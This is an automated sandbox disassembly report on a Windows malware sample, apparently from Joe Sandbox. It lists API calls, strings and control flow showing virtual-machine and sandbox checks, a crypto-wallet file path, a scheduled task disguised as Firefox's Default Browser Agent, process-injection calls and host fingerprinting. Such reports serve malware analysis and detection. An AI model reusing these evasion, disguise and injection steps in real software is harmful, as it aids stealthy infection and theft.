                              • StrStrIW.SHLWAPI(?,powershell.exe), ref: 010991A7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$lstrcmp$Heap$Attributes$Path$CombineProcess$CloseHandle$AllocCreateEnvironmentExpandFindFreeNameReadSizeStrings$AddressDevicesDisplayEnumFolderModuleProcUser$CallbackComputerDispatcherFirstGlobalMemoryMetricsNextStatusSystem
                              • String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$7$@$ANNA-PC$Admin$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat QXL controller$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
                              • API String ID: 1854435931-21779633
                              • Opcode ID: 071b1fe9efe4fc9e5e979b574eb1658472291245850e0ec730fd109cf3d90ded
                              • Instruction ID: f6af6dd7b345131bd3b9246d6339faf9b35d34a03d6d68ef2530fff2e2946060
                              • Opcode Fuzzy Hash: 071b1fe9efe4fc9e5e979b574eb1658472291245850e0ec730fd109cf3d90ded
                              • Instruction Fuzzy Hash: 6D22F3B190031CAAEF209BA8DCA8FEE7BFCBF45714F04459AF694E3140D7349A459B60

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 107 151300-151350 GetModuleHandleA VirtualAlloc 108 151352-151354 107->108 109 151359-151387 call 156fe0 107->109 110 1516a6-1516b3 call 154704 108->110 115 151395-1513a2 109->115 116 1513a4-1513df call 156fe0 115->116 117 1513e1-1513f9 115->117 116->115 118 1514ef-151528 call 1511f0 VirtualProtect 117->118 119 1513ff-151406 117->119 127 151536-151543 118->127 119->118 123 15140c-151417 119->123 126 151422-151429 123->126 126->118 128 15142f-151463 GetModuleHandleA GetProcAddress LoadLibraryA 126->128 129 151549-151571 127->129 130 15164a-151663 127->130 131 151469-151486 128->131 132 1514ea 128->132 136 151593-1515ad 129->136 137 151573-151591 VirtualFree 129->137 134 151665-151679 130->134 135 1516a3 130->135 138 15148e 131->138 139 151488-15148b 131->139 132->126 140 151684-151688 134->140 135->110 142 1515af-1515b6 136->142 143 1515b8 136->143 141 15152a-151532 137->141 144 1514a2-1514a8 138->144 139->138 140->135 145 15168a-151690 140->145 141->127 146 1515bf-1515c7 142->146 143->146 144->132 147 1514aa-1514b5 144->147 145->135 148 151692-1516a1 145->148 149 1515d2 146->149 150 1515c9-1515d0 146->150 151 1514b7-1514c4 147->151 152 1514c6-1514d2 147->152 148->140 153 1515d9-1515e2 149->153 150->153 154 1514d5-1514e8 GetProcAddress 151->154 152->154 157 1515e4-1515eb 153->157 158 1515ed 153->158 155 151490-15149f 154->155 155->144 159 1515f4-151616 157->159 158->159 161 151624-15163f VirtualProtect 159->161 162 151618-151621 159->162 161->130 162->161
                              APIs
                              • GetModuleHandleA.KERNEL32(kernel32), ref: 0015132A
                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00151343
                              • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA), ref: 00151439
                              • GetProcAddress.KERNEL32(00000000), ref: 00151440
                              • LoadLibraryA.KERNELBASE(?), ref: 00151459
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule$AddressAllocLibraryLoadProcVirtual
                              • String ID: LoadLibraryA$kernel32
                              • API String ID: 3393750808-970291620
                              • Opcode ID: 6ed9bd00da3875aebdad54d0ae3c4c2c64592c6b9f664a82029706237f953714
                              • Instruction ID: 914e9ecbb0444ebffc5610cfb88e5c9475c61173f59cbf47fce1c078b966ac52
                              • Opcode Fuzzy Hash: 6ed9bd00da3875aebdad54d0ae3c4c2c64592c6b9f664a82029706237f953714
                              • Instruction Fuzzy Hash: 3FD1F675E00219EFCB09CF98D890BEDB7B2FF88305F148159E826AB395D774A985CB50

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 249 151710-15175a call 151110 * 2 254 151760-151764 249->254 255 15183f-151858 call 1575a0 call 154704 249->255 254->255 256 15176a-15176e 254->256 256->255 258 151774-151778 256->258 258->255 260 15177e-15179c call 157928 258->260 265 1517a7-1517ad 260->265 266 1517c2-151824 call 1516c0 call 151300 GetPEB call 10991d0 265->266 267 1517af-1517c0 265->267 273 151827-15183c call 1575a0 * 2 266->273 267->265 273->255
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: HandleModule
                              • String ID:
                              • API String ID: 4139908857-0
                              • Opcode ID: 524f0eff9e74c8ad63a32b74a644895d0cb7185c1cdffe99bc6c990153b9f493
                              • Instruction ID: c98d07c6d26a1b308c7f5563b42444e846579932a6ffc9b6730781242595ee66
                              • Opcode Fuzzy Hash: 524f0eff9e74c8ad63a32b74a644895d0cb7185c1cdffe99bc6c990153b9f493
                              • Instruction Fuzzy Hash: 874139B5D00209EFCF04DF98D881AEEB7B1BF48305F148558D915AB341E734AA45CFA1

                              Control-flow Graph

                              APIs
                                • Part of subcall function 00153670: task.LIBCPMTD ref: 00153748
                              • LPtoDP.GDI32(00000000,0056AA94,0538CD39), ref: 00153C61
                              • GetLastError.KERNEL32 ref: 00153C6B
                              • ExitProcess.KERNEL32 ref: 00153C78
                              • BuildCommDCBAndTimeoutsA.KERNEL32(eruigoreh ertoerh634643,00000000,00000000), ref: 00153C87
                              • GetCurrentProcess.KERNEL32(00000000), ref: 00153C93
                              • TerminateProcess.KERNEL32(00000000), ref: 00153C9A
                              Strings
                              • eruigoreh ertoerh634643, xrefs: 00153C82
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                              • Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd
                              Similarity
                              • API ID: Process$BuildCommCurrentErrorExitLastTerminateTimeoutstask
                              • String ID: eruigoreh ertoerh634643
                              • API String ID: 3960728841-1078997068
                              • Opcode ID: 91635ee3c4d682a29915c4073a3a721676044de85789131b1b5f2f59e5345322
                              • Instruction ID: c942f98c930e5505f9c8b37416d0fd627ecd9b65d615c59b21744f7e60f13c4e
                              • Opcode Fuzzy Hash: 91635ee3c4d682a29915c4073a3a721676044de85789131b1b5f2f59e5345322
                              • Instruction Fuzzy Hash: A1018670A44208EBD710EFF19D0AB5D7BB4AB08742F104015F931EB590DBB09B4CCB21

                              Control-flow Graph

                              APIs
                                • Part of subcall function 010989B0: EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 010989EE
                                • Part of subcall function 010989B0: StrStrIW.KERNELBASE(?,Hyper-V), ref: 01098A0D
                                • Part of subcall function 010989B0: StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 01098A23
                                • Part of subcall function 010989B0: StrStrIW.SHLWAPI(?,Red Hat QXL controller), ref: 01098A39
                                • Part of subcall function 010989B0: EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 01098A4E
                                • Part of subcall function 010989B0: GetModuleHandleA.KERNEL32(kernel32), ref: 01098A59
                                • Part of subcall function 010989B0: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 01098A6D
                                • Part of subcall function 010989B0: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 01098A77
                                • Part of subcall function 010989B0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 01098AA3
                                • Part of subcall function 010989B0: ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 01098AB6
                                • Part of subcall function 010989B0: GetFileAttributesW.KERNELBASE(?), ref: 01098AC5
                                • Part of subcall function 010989B0: GetFileAttributesW.KERNEL32(?), ref: 01098AD7
                              • ExitProcess.KERNEL32 ref: 010991E1
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$ExitHandleModuleProcess
                              • String ID:
                              • API String ID: 237228072-0
                              • Opcode ID: 12f17515fbea49eb2060bb70485105b135bfdae23970cc8f7780d45bd2a3ce37
                              • Instruction ID: af3a7288f0953f742834c2681b492e73297bf81232ab30887ad5146d56c3556b
                              • Opcode Fuzzy Hash: 12f17515fbea49eb2060bb70485105b135bfdae23970cc8f7780d45bd2a3ce37
                              • Instruction Fuzzy Hash: 20D0121103460E42DF5137F91C397DD37442F73155F048296AAE0992D59D001110B577

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 279 1096d30-1096d89 VariantInit CoCreateInstance 280 1096de9 279->280 281 1096d8b-1096dba 279->281 282 1096dec-1096def 280->282 281->280 285 1096dbc-1096ddc SysAllocString 281->285 284 1096df3-1096dfb 282->284 286 1096dfd-1096dfe SysFreeString 284->286 287 1096e00-1096e04 284->287 285->282 293 1096dde-1096de7 285->293 286->287 288 109715a-109715f 287->288 289 1096e0a-1096e3b SysAllocString SysFreeString 287->289 291 1097161-1097163 288->291 292 1097167-1097170 288->292 295 1096e5d-1096e5f 289->295 296 1096e3d-1096e5a SysAllocString SysFreeString 289->296 291->292 293->284 297 1096e79-1096e91 295->297 298 1096e61-1096e77 SysAllocString SysFreeString 295->298 296->295 302 1097151-1097155 297->302 303 1096e97-1096ead 297->303 298->297 302->288 305 1096eaf-1096eeb SysAllocString SysFreeString SysAllocString SysFreeString 303->305 306 1096ef0-1096f06 303->306 305->306 309 1096f08-1096f4f SysAllocString SysFreeString 306->309 310 1096f54-1096f78 306->310 309->310 315 1096f7e-1096f8f 310->315 316 1097016-109701b 310->316 315->316 323 1096f95-1096fa8 315->323 317 109701d-109701f 316->317 318 1097023-1097028 316->318 317->318 321 109702a-109702c 318->321 322 1097030-1097054 318->322 321->322 326 10970b6-10970bb 322->326 327 1097056-1097067 322->327 323->316 330 1096faa-1096fec SysAllocString SysFreeString SysAllocString SysFreeString 323->330 331 10970bd-10970bf 326->331 332 10970c3-10970c8 326->332 327->326 337 1097069-109707c 327->337 346 109700d-1097011 330->346 347 1096fee-1097008 SysAllocString SysFreeString 330->347 331->332 334 10970ca-10970cc 332->334 335 10970d0-10970d4 332->335 334->335 338 1097148-109714c 335->338 339 10970d6-1097142 VariantInit SysAllocString * 2 SysFreeString VariantClear 335->339 337->326 344 109707e-1097099 SysAllocString SysFreeString 337->344 338->302 339->338 349 109709b-10970ab SysAllocString SysFreeString 344->349 350 10970ad-10970b1 344->350 346->316 347->346 349->350 350->326
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 01096D4E
                              • CoCreateInstance.OLE32(01091020,00000000,00000001,01091000,?), ref: 01096D7B
                              • SysAllocString.OLEAUT32(01091498), ref: 01096DC1
                              • SysFreeString.OLEAUT32(?), ref: 01096DFE
                              • SysAllocString.OLEAUT32(\Mozilla), ref: 01096E0F
                              • SysFreeString.OLEAUT32(00000000), ref: 01096E31
                              • SysAllocString.OLEAUT32(\Mozilla), ref: 01096E42
                              • SysFreeString.OLEAUT32(00000000), ref: 01096E58
                              • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 01096E66
                              • SysFreeString.OLEAUT32(00000000), ref: 01096E77
                              • SysAllocString.OLEAUT32(The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic), ref: 01096EB4
                              • SysFreeString.OLEAUT32(00000000), ref: 01096EC3
                              • SysAllocString.OLEAUT32(Mozilla), ref: 01096ECA
                              • SysFreeString.OLEAUT32(00000000), ref: 01096ED9
                              • SysAllocString.OLEAUT32(PT0S), ref: 01096F2E
                              • SysFreeString.OLEAUT32(00000000), ref: 01096F3D
                              • SysAllocString.OLEAUT32(Trigger1), ref: 01096FAF
                              • SysFreeString.OLEAUT32(00000000), ref: 01096FBE
                              • SysAllocString.OLEAUT32(2023-01-01T12:00:00), ref: 01096FC5
                              • SysFreeString.OLEAUT32(00000000), ref: 01096FD4
                              • SysAllocString.OLEAUT32(PT1M), ref: 01096FF3
                              • SysFreeString.OLEAUT32(00000000), ref: 01097002
                              • SysAllocString.OLEAUT32(C:\Windows\System32\wscript.exe), ref: 01097083
                              • SysFreeString.OLEAUT32(00000000), ref: 01097092
                              • SysAllocString.OLEAUT32(?), ref: 0109709C
                              • SysFreeString.OLEAUT32(00000000), ref: 010970AB
                              • VariantInit.OLEAUT32(?), ref: 010970DA
                              • SysAllocString.OLEAUT32(0109113C), ref: 010970EE
                              • SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 010970FF
                              • SysFreeString.OLEAUT32(00000000), ref: 0109713C
                              • VariantClear.OLEAUT32(?), ref: 01097142
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: String$Alloc$Free$Variant$Init$ClearCreateInstance
                              • String ID: 2023-01-01T12:00:00$C:\Windows\System32\wscript.exe$Firefox Default Browser Agent 318146B0AF4A39CB$Mozilla$PT0S$PT1M$The Default Browser Agent task checks when the default changes from Firefox to another browser. If the change happens under suspic$Trigger1$\Mozilla
                              • API String ID: 3904693211-3377861604
                              • Opcode ID: 3a502a363c785d6c442dc05b45bd0504012e478939335d33f6db6a70474f9566
                              • Instruction ID: 4b73b8c29d3d90e380529b8452d6ff4600498e5550a508b09b8ab2a9f4584e00
                              • Opcode Fuzzy Hash: 3a502a363c785d6c442dc05b45bd0504012e478939335d33f6db6a70474f9566
                              • Instruction Fuzzy Hash: C8F10A71A00209AFDB10DBA9C858FAEBBF9FF49314F104198F549EB250DB71AD45CBA1

                              Control-flow Graph

                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll), ref: 01095FCD
                              • GetProcAddress.KERNEL32(00000000,NtCreateSection), ref: 01095FE1
                              • GetProcAddress.KERNEL32(00000000,NtCreateProcessEx), ref: 01095FEC
                              • GetProcAddress.KERNEL32(00000000,RtlCreateProcessParametersEx), ref: 01095FF7
                              • GetProcAddress.KERNEL32(00000000,RtlDestroyProcessParameters), ref: 01096002
                              • GetProcAddress.KERNEL32(00000000,NtCreateThreadEx), ref: 0109600D
                              • GetTempPathW.KERNEL32(000000F6,?), ref: 01096026
                                • Part of subcall function 01092690: GetTickCount.KERNEL32 ref: 01092692
                              • wnsprintfW.SHLWAPI ref: 01096061
                              • PathCombineW.SHLWAPI(?,?,?), ref: 0109607B
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000002,00000080,00000000), ref: 010960A2
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 010960C6
                              • SetEndOfFile.KERNEL32(00000000), ref: 010960C9
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 010960D6
                              • wnsprintfW.SHLWAPI ref: 010960F4
                              • RtlInitUnicodeString.NTDLL(?,?), ref: 0109610A
                              • RtlInitUnicodeString.NTDLL(?,?), ref: 01096117
                              • GetCurrentProcess.KERNEL32(00000004,00000000,00000000,00000000,00000000), ref: 01096156
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 010961A5
                              • WriteFile.KERNEL32(00000000,00000000,00000400,00000000,00000000), ref: 010961EF
                              • FlushFileBuffers.KERNEL32(00000000), ref: 010961F7
                              • SetEndOfFile.KERNEL32(00000000), ref: 010961FE
                              • NtQueryInformationProcess.NTDLL ref: 01096213
                              • ReadProcessMemory.KERNEL32(00000000,?,?,00000480,00000000), ref: 0109623B
                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000004), ref: 01096292
                              • WriteProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 010962CE
                              • WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 010962DC
                              • NtClose.NTDLL ref: 01096315
                              • NtClose.NTDLL ref: 01096326
                              • NtClose.NTDLL ref: 01096330
                              • CloseHandle.KERNEL32(00000000), ref: 01096333
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AddressProcProcess$CloseWrite$Memory$HandleInitPathPointerStringUnicodewnsprintf$AllocBuffersCombineCountCreateCurrentFlushInformationModuleQueryReadTempTickVirtual
                              • String ID: "%s"$%08x%s$.exe$NtCreateProcessEx$NtCreateSection$NtCreateThreadEx$RtlCreateProcessParametersEx$RtlDestroyProcessParameters$ntdll
                              • API String ID: 3548791621-756185880
                              • Opcode ID: dda6b2f1f51c89356728160e23d8afb199c722bd9f5c08a4ea31039b390ce621
                              • Instruction ID: 36301e6a237ab78985cbb14970538e3ce63933f3d1ed19cf792bf77453bac370
                              • Opcode Fuzzy Hash: dda6b2f1f51c89356728160e23d8afb199c722bd9f5c08a4ea31039b390ce621
                              • Instruction Fuzzy Hash: 31B15C71A40209BBEF20DBA5DC59FAEBBBCFB08710F144099F644F7181D775A9409B54

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 548 1097900-109794a GetPEB LsaOpenPolicy 549 10979ca-1097a19 GetComputerNameW GetUserNameW WideCharToMultiByte 548->549 550 109794c-109795d LsaQueryInformationPolicy 548->550 551 1097a1b-1097a22 549->551 552 1097a24-1097a38 GetProcessHeap HeapAlloc 549->552 553 109795f-1097965 550->553 554 10979c1-10979c4 LsaClose 550->554 555 1097a5f-1097a7e WideCharToMultiByte 551->555 556 1097a59 552->556 557 1097a3a-1097a57 WideCharToMultiByte 552->557 558 10979ba-10979bb LsaFreeMemory 553->558 559 1097967-109797e GetProcessHeap HeapAlloc 553->559 554->549 560 1097a89-1097a9b GetProcessHeap HeapAlloc 555->560 561 1097a80-1097a87 555->561 556->555 557->555 558->554 562 1097980-109798e 559->562 563 10979b7 559->563 564 1097ab7-1097ad5 560->564 565 1097a9d-1097ab5 WideCharToMultiByte 560->565 561->564 566 10979b1-10979b3 562->566 567 1097990-1097997 562->567 563->558 570 1097aeb-1097aed 564->570 571 1097ad7 564->571 565->564 566->563 568 1097999 567->568 569 10979ab 567->569 574 10979a0-10979a9 568->574 569->566 573 1097af0-1097b08 call 1092690 570->573 572 1097ae0-1097ae9 571->572 572->570 572->572 577 1097b0a-1097b6c call 10976f0 wsprintfA * 2 573->577 574->569 574->574 580 1097b6e 577->580 581 1097b81-1097bb5 call 1096810 577->581 582 1097b70-1097b7f 580->582 585 1097bbf-1097bc4 581->585 586 1097bb7-1097bbd GetProcessHeap HeapFree 581->586 582->581 582->582 587 1097bce-1097bd3 585->587 588 1097bc6-1097bcc GetProcessHeap HeapFree 585->588 586->585 589 1097bdd-1097bdf 587->589 590 1097bd5-1097bdb GetProcessHeap HeapFree 587->590 588->587 591 1097be9-1097bef 589->591 592 1097be1-1097be7 GetProcessHeap HeapFree 589->592 590->589 592->591
                              APIs
                              • LsaOpenPolicy.ADVAPI32(00000000,0109A060,00000001,?), ref: 0109793C
                              • LsaQueryInformationPolicy.ADVAPI32(?,0000000C,?), ref: 01097955
                              • GetProcessHeap.KERNEL32(00000008,?), ref: 01097971
                              • HeapAlloc.KERNEL32(00000000), ref: 01097974
                              • LsaFreeMemory.ADVAPI32(?), ref: 010979BB
                              • LsaClose.ADVAPI32(?), ref: 010979C4
                              • GetComputerNameW.KERNEL32(?,?), ref: 010979E0
                              • GetUserNameW.ADVAPI32(?,00000101), ref: 010979F1
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 01097A12
                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 01097A28
                              • HeapAlloc.KERNEL32(00000000), ref: 01097A2B
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 01097A55
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 01097A77
                              • GetProcessHeap.KERNEL32(00000008,00000001), ref: 01097A8D
                              • HeapAlloc.KERNEL32(00000000), ref: 01097A90
                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 01097AB5
                              • wsprintfA.USER32 ref: 01097B36
                              • wsprintfA.USER32 ref: 01097B61
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01097BBA
                              • HeapFree.KERNEL32(00000000), ref: 01097BBD
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01097BC9
                              • HeapFree.KERNEL32(00000000), ref: 01097BCC
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 01097BD8
                              • HeapFree.KERNEL32(00000000), ref: 01097BDB
                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01097BE4
                              • HeapFree.KERNEL32(00000000), ref: 01097BE7
                              Strings
                              • %d|%s|%.16s|, xrefs: 01097B30
                              • 0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 01097AC2
                              • %s|%d.%d (%d)|%s|%s|%S, xrefs: 01097B5B
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Process$Free$ByteCharMultiWide$Alloc$NamePolicywsprintf$CloseComputerInformationMemoryOpenQueryUser
                              • String ID: %d|%s|%.16s|$%s|%d.%d (%d)|%s|%s|%S$0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
                              • API String ID: 4008773985-1210213088
                              • Opcode ID: d9c9ce29a4bbc2c894f87c1155a60cc3cac9d861776e9430450fa715609bd8c8
                              • Instruction ID: ae95cc97ead6156388f23778061ca8d60bc1ed458137e010e6b003acf9470388
                              • Opcode Fuzzy Hash: d9c9ce29a4bbc2c894f87c1155a60cc3cac9d861776e9430450fa715609bd8c8
                              • Instruction Fuzzy Hash: E891A372A00209AFEF209BA9DC15FAEBBB9FF84710F1441A5FA94E7180D7759901DF60

                              Control-flow Graph

                              APIs
                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtQueryInformationProcess,74DF0EE0,?), ref: 010993CC
                              • GetProcAddress.KERNEL32(00000000), ref: 010993D5
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlEnterCriticalSection), ref: 010993E4
                              • GetProcAddress.KERNEL32(00000000), ref: 010993E7
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlLeaveCriticalSection), ref: 010993F6
                              • GetProcAddress.KERNEL32(00000000), ref: 010993F9
                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString), ref: 01099408
                              • GetProcAddress.KERNEL32(00000000), ref: 0109940B
                              • GetCurrentProcessId.KERNEL32 ref: 01099439
                              • OpenProcess.KERNEL32(00000438,00000000,00000000), ref: 01099447
                              • ReadProcessMemory.KERNEL32(00000000,?,01097414,00000004,00000000), ref: 01099478
                              • ReadProcessMemory.KERNEL32(00000000,01097408,?,00000004,00000000), ref: 01099492
                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 010994A8
                              • StrNCatW.SHLWAPI(?,\explorer.exe,00000105), ref: 010994BF
                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 010994D3
                              • lstrcpyW.KERNEL32(00000000,?), ref: 010994E4
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 01099521
                              • ReadProcessMemory.KERNEL32(00000000,?,?,00000004,00000000), ref: 0109954D
                              • ReadProcessMemory.KERNEL32(00000000,?,?,?,00000000), ref: 0109956C
                              • CloseHandle.KERNEL32(00000000), ref: 010995AF
                              • StrCmpIW.SHLWAPI(?,?), ref: 010995C3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                              • Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$HandleModule$AddressMemoryProcRead$AllocCloseCurrentDirectoryFileNameOpenVirtualWindowslstrcpy
                              • String ID: NtQueryInformationProcess$RtlEnterCriticalSection$RtlInitUnicodeString$RtlLeaveCriticalSection$\explorer.exe$explorer.exe$ntdll.dll
                              • API String ID: 2609293587-3346233597
                              • Opcode ID: 89ab62abe75fcabe63e8b359f6678659f584d68aecb010fecf33e94c7a5ff031
                              • Instruction ID: 6f8a7de54ce3983872a072213b010b7efc8309a69a6a3ebaa18fc50df131ebf9
                              • Opcode Fuzzy Hash: 89ab62abe75fcabe63e8b359f6678659f584d68aecb010fecf33e94c7a5ff031
                              • Instruction Fuzzy Hash: A5616DB1A40208BBDF20DBA5DC59FAEBBB8EF44711F100195F644E7180DB74DA419BA0

                              Control-flow Graph

                              APIs
                              • ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104,?,?,?,010991F1), ref: 010972E6
                              • ExpandEnvironmentStringsW.KERNEL32(%ProgramW6432%,?,00000104,?,?,?,010991F1), ref: 010972F9
                              • lstrlenW.KERNEL32(?,?,?,?,010991F1), ref: 01097302
                              • ExpandEnvironmentStringsW.KERNEL32(%ProgramFiles%,?,00000104,?,?,?,010991F1), ref: 0109731D
                              • GetSystemWow64DirectoryW.KERNEL32(?,00000104,?,?,?,010991F1), ref: 0109732B
                              • GetLastError.KERNEL32(?,?,?,010991F1), ref: 01097335
